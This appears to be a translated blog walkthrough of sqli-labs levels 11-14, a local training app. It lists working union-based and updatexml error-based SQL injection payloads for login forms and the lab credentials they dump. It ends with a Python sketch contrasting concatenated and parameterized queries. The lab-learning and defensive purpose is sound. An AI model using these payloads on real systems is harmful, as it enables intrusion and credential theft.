  • sqli Less 11-14 - 2020-04-17

    Less-11

    http://127.0.0.1/sqli/Less-11/

     Looking at this page, start by entering admin / admin.

     Interesting, it actually returns this result. Now enter some random values.

     

     The response is clearly different. I'll capture the request and work from there.

    With the request captured, we can replay it for testing.

     A database error appears, which immediately suggests an injection point here.

    uname=xxeyuki' order by 2#&passwd=xxxxxxx&submit=Submit  # confirms there are 2 columns

    uname=xxeyuki' union select 1,database()#&passwd=xxxxxxx&submit=Submit  # returns the database name: security

    uname=xxeyuki' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=xxxxxxx&submit=Submit  # returns the tables: emails,referers,uagents,users

    uname=xxeyuki' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=xxxxxxx&submit=Submit  # returns the columns of the users table (no table_schema filter, so every table named users on the server is included)

    user_id,first_name,last_name,user,password,avatar,id,username,password,level,id,username,password,id,username,password

    uname=xxeyuki' union select 1,group_concat(username,"~",password) from users#&passwd=xxxxxxx&submit=Submit  # username and password data from the users table

    Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4

    Less-12

    Going straight to how to find the injection point and the closing sequence.

    uname=xxeyuki'&passwd=33yuki&submit=Submit  # a single quote produces no reaction

    uname=xxeyuki"&passwd=33yuki&submit=Submit  # this one reacts: a clear database error.

     The closing sequence ") seems quite obvious.

    uname=xxeyuki") order by 3#&passwd=33yuki&submit=Submit  # 3 errors, 2 does not: the column count is 2

    uname=xxeyuki") union select 1,database()#&passwd=33yuki&submit=Submit  # returns the database name: security

    uname=xxeyuki") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=33yuki&submit=Submit  # table: users

    uname=xxeyuki") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=33yuki&submit=Submit  # columns: username,password

    uname=xxeyuki") union select 1,group_concat(username,password) from users#&passwd=33yuki&submit=Submit  # username and password data

     Less-13

    uname=admin'&passwd=admin&submit=Submit  # seeing this error, I am fairly sure the closing sequence is ')

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin') LIMIT 0,1' at line 1

    uname=admin') order by 2#&passwd=admin&submit=Submit  # confirms the column count is 2

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1))#&passwd=admin&submit=Submit  # dump the database name

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))#&passwd=admin&submit=Submit  # dump the table names

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#&passwd=admin&submit=Submit  # dump the columns; annoyingly, only 17 characters come back

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 3,1),0x7e),1))#&passwd=admin&submit=Submit  # so they have to be dumped one at a time

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&passwd=admin&submit=Submit  # password column

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  # username

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select username from users limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  # username

    uname=admin') union select 1,(updatexml(1,concat(0x7e,(select password from users limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  # password

    Less-14

    uname=admin" union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1))#&passwd=admin&submit=Submit  # dump the database name

    uname=admin" union select 1,(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1))#&passwd=admin&submit=Submit  # dump the table name

    uname=admin" union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&passwd=admin&submit=Submit  # dump username

    uname=admin" union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&passwd=admin&submit=Submit  # dump password

    uname=admin" union select 1,(updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1))#&passwd=admin&submit=Submit

    uname=admin" union select 1,(updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1))#&passwd=admin&submit=Submit
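
The error quoted for Less-13 shows the input landing inside `('...')`. The sketch below is an added example, not code from the lab or the original post: it rebuilds that query shape with Python's sqlite3 standing in for MySQL (an assumption, as are the function names and the sample row) and compares it with a parameterized query that also keeps database errors away from the client.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the lab's MySQL (assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'admin')")
    return db

def login_concat(db, uname, passwd):
    # Vulnerable shape, inferred from the error text quoted for Less-13:
    # input is pasted between (' and '), so a quote in it ends the literal.
    sql = ("SELECT username, password FROM users WHERE username=('" + uname +
           "') AND password=('" + passwd + "') LIMIT 0,1")
    try:
        return db.execute(sql).fetchone(), None
    except sqlite3.Error as exc:
        # Returning the driver error to the client is what the quote probes
        # and the updatexml() requests in Less-13/14 depend on.
        return None, str(exc)

def login_param(db, uname, passwd):
    # Hardened: placeholders keep the input as data, and any database error
    # is replaced by a generic message (server-side logging omitted).
    sql = "SELECT username, password FROM users WHERE username=? AND password=? LIMIT 0,1"
    try:
        return db.execute(sql, (uname, passwd)).fetchone(), None
    except sqlite3.Error:
        return None, "login failed"

# uname values taken from the requests in the walkthrough above.
PROBES = ["admin'", 'xxeyuki"', "xxeyuki' order by 2#", "admin') order by 2#"]

def compare():
    # For each probe: does the concatenated query leak an error, and what
    # does the parameterized query return for the same input?
    db = make_db()
    return [(p, login_concat(db, p, "x")[1] is not None, login_param(db, p, "x"))
            for p in PROBES]

if __name__ == "__main__":
    for probe, leaked, hardened in compare():
        print(f"{probe!r:28} concat leaks error: {leaked}  param: {hardened}")
```

With the parameterized form every probe is just a username that does not exist, so the response is the same as for any other failed login.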

      

  • Original article: https://www.cnblogs.com/llcn/p/12717807.html